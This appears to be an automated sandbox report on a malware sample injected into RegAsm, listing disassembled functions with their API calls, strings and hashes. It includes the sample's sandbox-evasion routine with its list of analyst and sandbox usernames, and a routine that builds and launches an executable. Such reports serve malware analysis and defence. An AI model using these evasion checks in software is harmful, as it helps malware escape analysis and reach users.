free.MOZGLUE(00000000), ref: 6C55EC5C

Strings

[I %d/%d] profiler_start, xrefs: 6C55EBB4
[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C55EA9B

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$Current$ReleaseThread$Acquiregetenv$Process_getpid$?profiler_init@baseprofiler@mozilla@@CloseHandleInit_thread_footerObjectSingleTerminateWait__acrt_iob_func__stdio_common_vfprintffreemallocmemset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 1341148965-1186885292
Opcode ID: 4a9b92b7c832de0167b153909d86b5a29239e83077e85c6e2dba332b26e867d1
Instruction ID: 86f3e4cd8f7b09d5e0fc97a76a419d0aef70474c51d4a9c3cb24edbcb76f1eb2
Opcode Fuzzy Hash: 4a9b92b7c832de0167b153909d86b5a29239e83077e85c6e2dba332b26e867d1
Instruction Fuzzy Hash: 74A15771700244CFDB109F28CC44BAA77B9FFC6318F5341AAE91A87B41DB75A825CB95

Function 00401927 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 00401A13
lstrcmpiA.KERNEL32(0043ABCC,?), ref: 00401A2E

Strings

virus, xrefs: 004019EB
Johnson, xrefs: 00401987
John Doe, xrefs: 004019F5
user, xrefs: 004019B9
CurrentUser, xrefs: 0040194B
Sand box, xrefs: 00401955
Emily, xrefs: 0040195F
Hong Lee, xrefs: 00401973
WDAGUtilityAccount, xrefs: 004019FF
timmy, xrefs: 004019AF
HAPUBWS, xrefs: 00401969
test user, xrefs: 004019E1
malware, xrefs: 004019CD
Miller, xrefs: 00401991
milozs, xrefs: 0040199B
IT-ADMIN, xrefs: 0040197D
sandbox, xrefs: 004019C3
maltest, xrefs: 004019D7
Peter Wilson, xrefs: 004019A5

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: NameUserlstrcmpi
String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
API String ID: 542268695-1784693376
Opcode ID: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
Instruction ID: b7e7ac9f27e83d335140a50ac772a364dc2a7579303695bb9c42e1fce2a6af08
Opcode Fuzzy Hash: a14623c780237b748c23d57be73366fad00cd6805492050cb9e0f9165e120a21
Instruction Fuzzy Hash: B42103B094526C8BCB20CF159D4C6DDBBB5AB5D308F00B1DAD1886A210C7B85ED9CF4D

Function 6C55F6E0 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 235threadstringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
Part of subcall function 6C559420: __Init_thread_footer.LIBCMT ref: 6C55949F

GetCurrentThreadId.KERNEL32 ref: 6C55F70E
??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C55F8F9

Part of subcall function 6C526390: GetCurrentThreadId.KERNEL32 ref: 6C5263D0
Part of subcall function 6C526390: AcquireSRWLockExclusive.KERNEL32 ref: 6C5263DF
Part of subcall function 6C526390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C52640E

ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F93A
GetCurrentThreadId.KERNEL32 ref: 6C55F98A
GetCurrentThreadId.KERNEL32 ref: 6C55F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C55F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C55F716

Part of subcall function 6C5594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5594EE
Part of subcall function 6C5594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C559508

Part of subcall function 6C51B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C51B5E0

GetCurrentThreadId.KERNEL32 ref: 6C55F739
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55F746
GetCurrentThreadId.KERNEL32 ref: 6C55F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C59385B,00000002,?,?,?,?,?), ref: 6C55F829
free.MOZGLUE(?,?,00000000,?), ref: 6C55F84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C55F866
free.MOZGLUE(?), ref: 6C55FA0C

Part of subcall function 6C525E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5255E1), ref: 6C525E8C
Part of subcall function 6C525E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C525E9D
Part of subcall function 6C525E60: GetCurrentThreadId.KERNEL32 ref: 6C525EAB
Part of subcall function 6C525E60: GetCurrentThreadId.KERNEL32 ref: 6C525EB8
Part of subcall function 6C525E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C525ECF
Part of subcall function 6C525E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C525F27
Part of subcall function 6C525E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C525F47
Part of subcall function 6C525E60: GetCurrentProcess.KERNEL32 ref: 6C525F53
Part of subcall function 6C525E60: GetCurrentThread.KERNEL32 ref: 6C525F5C
Part of subcall function 6C525E60: GetCurrentProcess.KERNEL32 ref: 6C525F66
Part of subcall function 6C525E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C525F7E

free.MOZGLUE(?), ref: 6C55F9C5
free.MOZGLUE(?), ref: 6C55F9DA

Strings

[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C55F9A6
Thread , xrefs: 6C55F789
" attempted to re-register as ", xrefs: 6C55F858
[D %d/%d] profiler_register_thread(%s), xrefs: 6C55F71F

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: f6a0324ee70af98fa9cd5d27190fc604b205b7cb7b27aaf72927e8430dea42db
Instruction ID: e70d55724929e196631f26cb9694e1d924c2adbc5245fca041fa065c19924f0d
Opcode Fuzzy Hash: f6a0324ee70af98fa9cd5d27190fc604b205b7cb7b27aaf72927e8430dea42db
Instruction Fuzzy Hash: F981E3B1604640DFDB10DF64CC40AAAB7B5AFC5308F86469EE84997B51EB30AC59CB92

Function 0041260C Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 204stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

_memset.LIBCMT ref: 004127B1
lstrcatA.KERNEL32(?,?,?,?,?), ref: 004127C3
lstrcatA.KERNEL32(?,00436698), ref: 004127D5
lstrcatA.KERNEL32(?,4b74261d834413e886f920a1e9dc5b33), ref: 004127E7
lstrcatA.KERNEL32(?,0043669C), ref: 004127F9
lstrcatA.KERNEL32(?,?), ref: 00412809
lstrcatA.KERNEL32(?,004366A0), ref: 0041281B
lstrlenA.KERNEL32(?), ref: 00412824
lstrcatA.KERNEL32(?,EMPTY), ref: 00412840
lstrcatA.KERNEL32(?,004366AC), ref: 00412852
lstrcatA.KERNEL32(?,?), ref: 00412862
lstrcatA.KERNEL32(?,004366B0), ref: 00412874
lstrlenA.KERNEL32(?), ref: 00412881
_memset.LIBCMT ref: 004128B7

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,004366B4,?), ref: 00412924
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00412932

Strings

4b74261d834413e886f920a1e9dc5b33, xrefs: 004127DB
EMPTY, xrefs: 0041283A
.exe, xrefs: 0041264F

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
String ID: .exe$4b74261d834413e886f920a1e9dc5b33$EMPTY
API String ID: 141474312-4192118096
Opcode ID: 7423630355bc0ae080dcc3895a676b474c595fadf28ca0ec63f6465bb34c18d8
Instruction ID: 30b7237e4d63740a0c3ffa21d4e9ba1d0fd5571b7a7901b34f1eecf9535dda31
Opcode Fuzzy Hash: 7423630355bc0ae080dcc3895a676b474c595fadf28ca0ec63f6465bb34c18d8
Instruction Fuzzy Hash: 99814FB2E40129ABCF11EF61DD46ACD7779AB08309F4054BAB708B3051D679AFC98F58

Function 6C524180 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 180libraryloaderCOMMON

Download Yara Rule

APIs

?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C524196
memset.VCRUNTIME140(?,00000000,00000110,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C5241F1
VerSetConditionMask.NTDLL ref: 6C524223
VerSetConditionMask.NTDLL ref: 6C52422A
VerSetConditionMask.NTDLL ref: 6C524231
VerSetConditionMask.NTDLL ref: 6C524238
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C524245
LoadLibraryW.KERNEL32(Shcore.dll,?,?,00000010,00000003,?,00000020,00000003,?,00000004,00000003,?,00000001,00000003), ref: 6C524263
GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 6C52427A
FreeLibrary.KERNEL32(?), ref: 6C524299
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C5242C4
VerSetConditionMask.NTDLL ref: 6C5242F6
VerSetConditionMask.NTDLL ref: 6C524302
VerSetConditionMask.NTDLL ref: 6C524309
VerSetConditionMask.NTDLL ref: 6C524310
VerSetConditionMask.NTDLL ref: 6C524317
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C524324

Strings

Shcore.dll, xrefs: 6C52425E
SetProcessDpiAwareness, xrefs: 6C524274

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ConditionMask$InfoLibraryVerifyVersionmemset$AddressDown@mozilla@@FreeLoadLockedProcWin32k
String ID: SetProcessDpiAwareness$Shcore.dll
API String ID: 3038791930-999387375
Opcode ID: df7c96a6896320499217e630c30d68705746da79b05a806e5b8161ccc9f540e4
Instruction ID: 35c2da6241fbfdeb6790c7e26e0104c83560be63116b0f319b8afdc553ac1ddd
Opcode Fuzzy Hash: df7c96a6896320499217e630c30d68705746da79b05a806e5b8161ccc9f540e4
Instruction Fuzzy Hash: E751D471A40264ABFB10AF65CC48BAF77BCEF86714F124A58F906976C0DB789D40CB94

Function 6C55EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
Part of subcall function 6C559420: __Init_thread_footer.LIBCMT ref: 6C55949F

GetCurrentThreadId.KERNEL32 ref: 6C55EE60
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55EE6D
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C55EEA5
CloseHandle.KERNEL32(?), ref: 6C55EEB4
free.MOZGLUE(00000000), ref: 6C55EEBB
GetCurrentThreadId.KERNEL32 ref: 6C55EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C55EECF

Part of subcall function 6C55DE60: GetCurrentThreadId.KERNEL32 ref: 6C55DE73
Part of subcall function 6C55DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C524A68), ref: 6C55DE7B
Part of subcall function 6C55DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C524A68), ref: 6C55DEB8
Part of subcall function 6C55DE60: free.MOZGLUE(00000000,?,6C524A68), ref: 6C55DEFE
Part of subcall function 6C55DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C55DF38

Part of subcall function 6C54CBE8: GetCurrentProcess.KERNEL32(?,6C5131A7), ref: 6C54CBF1
Part of subcall function 6C54CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5131A7), ref: 6C54CBFA

GetCurrentThreadId.KERNEL32 ref: 6C55EF1E
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55EF2B
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55EF59
GetCurrentThreadId.KERNEL32 ref: 6C55EFB0
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55EFBD
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55EFE1
GetCurrentThreadId.KERNEL32 ref: 6C55EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C55F000

Part of subcall function 6C5594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5594EE
Part of subcall function 6C5594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C559508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C55F02F

Part of subcall function 6C55F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C55F09B
Part of subcall function 6C55F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C55F0AC
Part of subcall function 6C55F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C55F0BE

Strings

[I %d/%d] profiler_pause, xrefs: 6C55F008
[I %d/%d] profiler_stop, xrefs: 6C55EED7

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 4f06686b918210c604b39266f080f9c4e3f3962a47646f716a41e7475e1d22a2
Instruction ID: fa45b89462627bc962d5d415282a75f2b477fdca107f55f64e6e86494e2794a1
Opcode Fuzzy Hash: 4f06686b918210c604b39266f080f9c4e3f3962a47646f716a41e7475e1d22a2
Instruction Fuzzy Hash: ED51F631704290DFEB10AF64DC087A977B8EB86318F5706D6F91983B41DB795C24C7AA

Function 6C54D010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C59E804), ref: 6C54D047
GetSystemInfo.KERNEL32(?), ref: 6C54D093
__Init_thread_footer.LIBCMT ref: 6C54D0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C59E810,00000040), ref: 6C54D0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6C59E7B8,00001388), ref: 6C54D147
InitializeCriticalSectionAndSpinCount.KERNEL32(6C59E744,00001388), ref: 6C54D162
InitializeCriticalSectionAndSpinCount.KERNEL32(6C59E784,00001388), ref: 6C54D18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6C59E7DC,00001388), ref: 6C54D1B1

Strings

Compile-time page size does not divide the runtime one., xrefs: 6C54D26D
: (malloc) Unsupported character in malloc options: ', xrefs: 6C54D322
MOZ_CRASH(), xrefs: 6C54D277
<jemalloc>, xrefs: 6C54D268, 6C54D311
MALLOC_OPTIONS, xrefs: 6C54D0CB

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: 1c7f8e28058c0a757d825ba72e753df82fe6fd5459994e7611dd69e2a6573a8f
Instruction ID: 331c2b1e8a914f056e5ab4ac315c4ce2568851182495ec22c6359e075c1afac0
Opcode Fuzzy Hash: 1c7f8e28058c0a757d825ba72e753df82fe6fd5459994e7611dd69e2a6573a8f
Instruction Fuzzy Hash: 1381E070B042D0DBEB04DF68CC54BA937B5FB46308F1285AAE90197B80E7B59805CBDA

Function 6C527FD0 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C528007
moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C52801D

Part of subcall function 6C52CA10: malloc.MOZGLUE(?), ref: 6C52CA26

memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C52802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C52803D
moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C52808D

Part of subcall function 6C52CA10: mozalloc_abort.MOZGLUE(?), ref: 6C52CAA2

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C52809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C5280B9
moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C5280DF
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5280ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5280FB
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C52810D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C528133
free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C528149
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C528167
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C52817C
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C528199

Strings

0>Ul, xrefs: 6C52811E

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
String ID: 0>Ul
API String ID: 2721933968-2085776197
Opcode ID: af4e1a6d2875a57e239f40b27d01a4035756484ba232d8c08c20372061f7da44
Instruction ID: 1504db00423ffa273704cc553ebbf769458e409241ad3163bf8579a486e63102
Opcode Fuzzy Hash: af4e1a6d2875a57e239f40b27d01a4035756484ba232d8c08c20372061f7da44
Instruction Fuzzy Hash: 0F5172B2E001549BDF00DFA5DC84AAFB7F9EF89224F550125E815E7781E734AD048BA1

Function 004139C2 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 127stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
ExitProcess.KERNEL32 ref: 004139E2
strtok_s.MSVCRT ref: 004139F3

Strings

DwA, xrefs: 004139EC, 004139EF
block, xrefs: 004139CB

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
